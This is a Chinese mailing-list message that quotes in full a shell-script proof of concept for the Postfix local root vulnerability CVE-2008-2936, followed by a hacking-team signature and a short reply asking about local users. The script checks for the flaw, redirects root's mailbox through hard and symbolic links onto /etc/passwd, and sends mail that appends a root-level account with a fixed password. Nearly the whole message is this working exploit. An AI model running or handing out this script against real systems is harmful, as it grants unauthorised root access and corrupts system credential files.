要系统本地用户? 2008/9/1 大风 <[EMAIL PROTECTED]>
>
>
> #!/bin/sh
>
> #
>
> # "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
>
> # by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <[EMAIL PROTECTED]>
>
> #
>
> # Tested: Ubuntu / Debian
>
> #
>
> # [ Madrid, 30.Aug.2008 ]
>
> #
>
>
>
> # Config
>
>
>
> writable_dir=/tmp
>
> spool_dir=/var/mail # Use "postconf mail_spool_directory" to
> obtain this
>
> user=root
>
> target=/etc/passwd
>
> useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15
> /usr/bin/atq -> at
>
> useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls
> -l {} \; | less
>
> seconds=3
>
> user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is
> "dsrrocks"
>
> postfix=`which postfix` # /usr/sbin/postfix
>
> postconf=/usr/sbin/postconf
>
> postmap=/usr/sbin/postmap
>
>
>
>
>
> # Funcs
>
>
>
> quit()
>
> {
>
> echo "$1"
>
> exit
>
> }
>
>
>
>
>
> # Step 1: is my system vulnerable?
>
>
>
> head -n 9 $0 | tail -n 8
>
> if [ $postfix ] ; then
>
> echo "[*] Postfix seems to be installed"
>
> else
>
> quit "[!] Are you sure Postfix is installed?"
>
> fi
>
>
>
> mkdir -p $writable_dir/pocfix
>
> touch $writable_dir/pocfix/src
>
> ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
>
> ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2
>
>
>
> if [ -L $writable_dir/pocfix/dst2 ] ; then
>
> echo "[*] Hardlink to symlink not dereferenced"
>
> rm -rf $writable_dir/pocfix
>
> else
>
> rm -rf $writable_dir/pocfix
>
> quit "[!] Hardlink to symlink correctly dereferenced. System is not
> vulnerable"
>
> fi
>
>
>
> if [ -d $spool_dir -a -w $spool_dir ] ; then
>
> echo "[*] Spool dir is writable"
>
> else
>
> quit "[!] Spool dir is not writable"
>
> fi
>
>
>
> if [ -e $spool_dir/$user ] ; then
>
> rm -f $spool_dir/$user
>
> echo "[*] Mailbox for \"$user\" found. Trying to delete it"
>
>
>
> if [ -e $spool_dir/$user ] ; then
>
> quit "[!] Couldn't delete it"
>
> else
>
> echo "[*] Deletion ok"
>
> fi
>
>
>
> fi
>
>
>
> if [ -e $spool_dir/$useful_link_dst ] ; then
>
> rm -f $spool_dir/$useful_link_dst
>
> echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"
>
>
>
> if [ -e $spool_dir/$useful_link_dst ] ; then
>
> quit "[!] Couldn't delete it"
>
> else
>
> echo "[*] Deletion ok"
>
> fi
>
>
>
> fi
>
>
>
> aliases=`$postconf alias_database | cut -d"=" -f2`
>
> $postconf alias_maps | grep -q $aliases
>
> if [ $? -eq 0 ] ; then
>
> if [ $aliases ] ; then
>
> $postmap -q $user $aliases > /dev/null
>
> if [ $? -eq 0 ] ; then
>
> quit "[!] Mail alias for \"$user\" exists"
>
> fi
>
> fi
>
> fi
>
>
>
> lda=`$postconf mailbox_command | cut -d"=" -f2`
>
> if [ $lda ] ; then
>
> quit "[!] Non-Postfix LDA detected"
>
> fi
>
>
>
> $postconf home_mailbox | grep -q '/$'
>
> if [ $? -eq 0 ] ; then
>
> quit "[!] Maildir-style mailbox detected"
>
> fi
>
>
>
>
>
> # Step 2: Exploiting
>
>
>
> ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create
> hardlink (different partitions?)"
>
> ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!]
> Couldn't create symlink pointing to target file"
>
> cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up:
> $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"
>
> echo "[*] Sending mail ($seconds seconds wait)"
>
> echo $user_in_passwd | /usr/sbin/sendmail $user
>
>
>
> sleep $seconds
>
>
>
> diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null
>
>
>
> if [ $? -eq 0 ] ; then
>
> echo "[!] Exploit failed"
>
> else
>
> echo "[*] Exploit successful (appended data to $target). Now \"su dsr\",
> pass is \"dsrrocks\")"
>
> fi
>
>
>
> rm -f $spool_dir/$user
>
> rm -f $spool_dir/$useful_link_dst
>
>
>
> # milw0rm.com [2008-08-31]
>
>
>
>
>
>
>
> *[Ph4nt0m] <http://www.ph4nt0m.org/> *
>
> *[Ph4nt0m Security Team]*
>
> * [EMAIL PROTECTED] <http://blog.ph4nt0m.org/>*
>
> * Email: [EMAIL PROTECTED]
>
> * PingMe:
> <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wuhq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
> *
>
> * **=== V3ry G00d, V3ry Str0ng ===*
>
> * === Ultim4te H4cking ===*
>
> * === XPLOITZ ! ===*
>
> * === #_# ===*
>
> *#If you brave,there is nothing you cannot achieve.#*
>
>
>
>
>
> >
>
--
I am aking
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件,请发到 [email protected]
要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
<<inline: image001.gif>>
